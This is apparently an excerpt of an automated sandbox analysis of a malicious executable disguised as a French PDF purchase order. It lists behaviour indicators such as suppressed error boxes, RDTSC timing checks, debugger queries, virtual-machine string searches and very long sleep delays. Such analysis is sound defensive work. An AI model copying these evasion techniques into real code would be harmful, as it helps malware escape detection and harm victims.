Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 00000000028885E4 second address: 00000000028885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 000000000288897E second address: 0000000002888984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Code function: 2_2_004088B0 rdtsc

2_2_004088B0

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe TID: 672	Thread sleep time: -40528s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe TID: 3412	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5308	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 1532	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Thread delayed: delay time: 40528			Jump to behavior
Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000003.00000000.260902684.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.260902684.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000003.00000000.261202589.00000000088BF000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.260714428.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.259157463.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.280678597.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000003.00000000.260902684.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000003.00000000.260902684.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.261014037.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000003.00000000.280797012.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000003.00000000.259157463.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.259157463.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WWAHost.exe, 0000000A.00000002.473051684.0000000002BD3000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000003.00000000.259157463.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Code function: 2_2_004088B0 rdtsc

2_2_004088B0

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe

Code function: 2_2_00409B20 LdrLoadDll,

2_2_00409B20

Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361DB60 mov ecx, dword ptr fs:[00000030h]	10_2_0361DB60
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362FF60 mov eax, dword ptr fs:[00000030h]	10_2_0362FF60
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E8F6A mov eax, dword ptr fs:[00000030h]	10_2_036E8F6A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03643B7A mov eax, dword ptr fs:[00000030h]	10_2_03643B7A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03643B7A mov eax, dword ptr fs:[00000030h]	10_2_03643B7A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361DB40 mov eax, dword ptr fs:[00000030h]	10_2_0361DB40
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362EF40 mov eax, dword ptr fs:[00000030h]	10_2_0362EF40
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E8B58 mov eax, dword ptr fs:[00000030h]	10_2_036E8B58
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361F358 mov eax, dword ptr fs:[00000030h]	10_2_0361F358
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03614F2E mov eax, dword ptr fs:[00000030h]	10_2_03614F2E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03614F2E mov eax, dword ptr fs:[00000030h]	10_2_03614F2E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364E730 mov eax, dword ptr fs:[00000030h]	10_2_0364E730
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E070D mov eax, dword ptr fs:[00000030h]	10_2_036E070D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E070D mov eax, dword ptr fs:[00000030h]	10_2_036E070D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364A70E mov eax, dword ptr fs:[00000030h]	10_2_0364A70E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364A70E mov eax, dword ptr fs:[00000030h]	10_2_0364A70E
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363F716 mov eax, dword ptr fs:[00000030h]	10_2_0363F716
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D131B mov eax, dword ptr fs:[00000030h]	10_2_036D131B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AFF10 mov eax, dword ptr fs:[00000030h]	10_2_036AFF10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AFF10 mov eax, dword ptr fs:[00000030h]	10_2_036AFF10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]	10_2_036403E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]	10_2_036403E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]	10_2_036403E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]	10_2_036403E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]	10_2_036403E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]	10_2_036403E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363DBE9 mov eax, dword ptr fs:[00000030h]	10_2_0363DBE9
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036537F5 mov eax, dword ptr fs:[00000030h]	10_2_036537F5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036953CA mov eax, dword ptr fs:[00000030h]	10_2_036953CA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036953CA mov eax, dword ptr fs:[00000030h]	10_2_036953CA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03644BAD mov eax, dword ptr fs:[00000030h]	10_2_03644BAD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03644BAD mov eax, dword ptr fs:[00000030h]	10_2_03644BAD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03644BAD mov eax, dword ptr fs:[00000030h]	10_2_03644BAD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E5BA5 mov eax, dword ptr fs:[00000030h]	10_2_036E5BA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D138A mov eax, dword ptr fs:[00000030h]	10_2_036D138A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036CD380 mov ecx, dword ptr fs:[00000030h]	10_2_036CD380
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03621B8F mov eax, dword ptr fs:[00000030h]	10_2_03621B8F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03621B8F mov eax, dword ptr fs:[00000030h]	10_2_03621B8F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03642397 mov eax, dword ptr fs:[00000030h]	10_2_03642397
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364B390 mov eax, dword ptr fs:[00000030h]	10_2_0364B390
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03628794 mov eax, dword ptr fs:[00000030h]	10_2_03628794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03697794 mov eax, dword ptr fs:[00000030h]	10_2_03697794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03697794 mov eax, dword ptr fs:[00000030h]	10_2_03697794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03697794 mov eax, dword ptr fs:[00000030h]	10_2_03697794
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036CB260 mov eax, dword ptr fs:[00000030h]	10_2_036CB260
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036CB260 mov eax, dword ptr fs:[00000030h]	10_2_036CB260
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E8A62 mov eax, dword ptr fs:[00000030h]	10_2_036E8A62
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362766D mov eax, dword ptr fs:[00000030h]	10_2_0362766D
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363AE73 mov eax, dword ptr fs:[00000030h]	10_2_0363AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363AE73 mov eax, dword ptr fs:[00000030h]	10_2_0363AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363AE73 mov eax, dword ptr fs:[00000030h]	10_2_0363AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363AE73 mov eax, dword ptr fs:[00000030h]	10_2_0363AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363AE73 mov eax, dword ptr fs:[00000030h]	10_2_0363AE73
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0365927A mov eax, dword ptr fs:[00000030h]	10_2_0365927A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03619240 mov eax, dword ptr fs:[00000030h]	10_2_03619240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03619240 mov eax, dword ptr fs:[00000030h]	10_2_03619240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03619240 mov eax, dword ptr fs:[00000030h]	10_2_03619240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03619240 mov eax, dword ptr fs:[00000030h]	10_2_03619240
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]	10_2_03627E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]	10_2_03627E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]	10_2_03627E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]	10_2_03627E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]	10_2_03627E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]	10_2_03627E41
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036DAE44 mov eax, dword ptr fs:[00000030h]	10_2_036DAE44
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036DAE44 mov eax, dword ptr fs:[00000030h]	10_2_036DAE44
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036DEA55 mov eax, dword ptr fs:[00000030h]	10_2_036DEA55
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036A4257 mov eax, dword ptr fs:[00000030h]	10_2_036A4257
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361E620 mov eax, dword ptr fs:[00000030h]	10_2_0361E620
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03654A2C mov eax, dword ptr fs:[00000030h]	10_2_03654A2C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03654A2C mov eax, dword ptr fs:[00000030h]	10_2_03654A2C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036CFE3F mov eax, dword ptr fs:[00000030h]	10_2_036CFE3F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361C600 mov eax, dword ptr fs:[00000030h]	10_2_0361C600
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361C600 mov eax, dword ptr fs:[00000030h]	10_2_0361C600
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361C600 mov eax, dword ptr fs:[00000030h]	10_2_0361C600
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03648E00 mov eax, dword ptr fs:[00000030h]	10_2_03648E00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036D1608 mov eax, dword ptr fs:[00000030h]	10_2_036D1608
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03628A0A mov eax, dword ptr fs:[00000030h]	10_2_03628A0A
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03615210 mov eax, dword ptr fs:[00000030h]	10_2_03615210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03615210 mov ecx, dword ptr fs:[00000030h]	10_2_03615210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03615210 mov eax, dword ptr fs:[00000030h]	10_2_03615210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03615210 mov eax, dword ptr fs:[00000030h]	10_2_03615210
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361AA16 mov eax, dword ptr fs:[00000030h]	10_2_0361AA16
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361AA16 mov eax, dword ptr fs:[00000030h]	10_2_0361AA16
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364A61C mov eax, dword ptr fs:[00000030h]	10_2_0364A61C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364A61C mov eax, dword ptr fs:[00000030h]	10_2_0364A61C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03633A1C mov eax, dword ptr fs:[00000030h]	10_2_03633A1C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036276E2 mov eax, dword ptr fs:[00000030h]	10_2_036276E2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03642AE4 mov eax, dword ptr fs:[00000030h]	10_2_03642AE4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036416E0 mov ecx, dword ptr fs:[00000030h]	10_2_036416E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03658EC7 mov eax, dword ptr fs:[00000030h]	10_2_03658EC7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036436CC mov eax, dword ptr fs:[00000030h]	10_2_036436CC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036CFEC0 mov eax, dword ptr fs:[00000030h]	10_2_036CFEC0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03642ACB mov eax, dword ptr fs:[00000030h]	10_2_03642ACB
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E8ED6 mov eax, dword ptr fs:[00000030h]	10_2_036E8ED6
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036152A5 mov eax, dword ptr fs:[00000030h]	10_2_036152A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036152A5 mov eax, dword ptr fs:[00000030h]	10_2_036152A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036152A5 mov eax, dword ptr fs:[00000030h]	10_2_036152A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036152A5 mov eax, dword ptr fs:[00000030h]	10_2_036152A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036152A5 mov eax, dword ptr fs:[00000030h]	10_2_036152A5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E0EA5 mov eax, dword ptr fs:[00000030h]	10_2_036E0EA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E0EA5 mov eax, dword ptr fs:[00000030h]	10_2_036E0EA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036E0EA5 mov eax, dword ptr fs:[00000030h]	10_2_036E0EA5
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036946A7 mov eax, dword ptr fs:[00000030h]	10_2_036946A7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362AAB0 mov eax, dword ptr fs:[00000030h]	10_2_0362AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0362AAB0 mov eax, dword ptr fs:[00000030h]	10_2_0362AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364FAB0 mov eax, dword ptr fs:[00000030h]	10_2_0364FAB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036AFE87 mov eax, dword ptr fs:[00000030h]	10_2_036AFE87
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364D294 mov eax, dword ptr fs:[00000030h]	10_2_0364D294
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0364D294 mov eax, dword ptr fs:[00000030h]	10_2_0364D294
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361C962 mov eax, dword ptr fs:[00000030h]	10_2_0361C962
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361B171 mov eax, dword ptr fs:[00000030h]	10_2_0361B171
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361B171 mov eax, dword ptr fs:[00000030h]	10_2_0361B171
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363C577 mov eax, dword ptr fs:[00000030h]	10_2_0363C577
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363C577 mov eax, dword ptr fs:[00000030h]	10_2_0363C577
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03653D43 mov eax, dword ptr fs:[00000030h]	10_2_03653D43
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363B944 mov eax, dword ptr fs:[00000030h]	10_2_0363B944
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0363B944 mov eax, dword ptr fs:[00000030h]	10_2_0363B944
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03693540 mov eax, dword ptr fs:[00000030h]	10_2_03693540
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03637D50 mov eax, dword ptr fs:[00000030h]	10_2_03637D50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03634120 mov eax, dword ptr fs:[00000030h]	10_2_03634120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03634120 mov eax, dword ptr fs:[00000030h]	10_2_03634120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03634120 mov eax, dword ptr fs:[00000030h]	10_2_03634120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03634120 mov eax, dword ptr fs:[00000030h]	10_2_03634120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03634120 mov ecx, dword ptr fs:[00000030h]	10_2_03634120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_0361AD30 mov eax, dword ptr fs:[00000030h]	10_2_0361AD30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_036DE539 mov eax, dword ptr fs:[00000030h]	10_2_036DE539
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]	10_2_03623D34
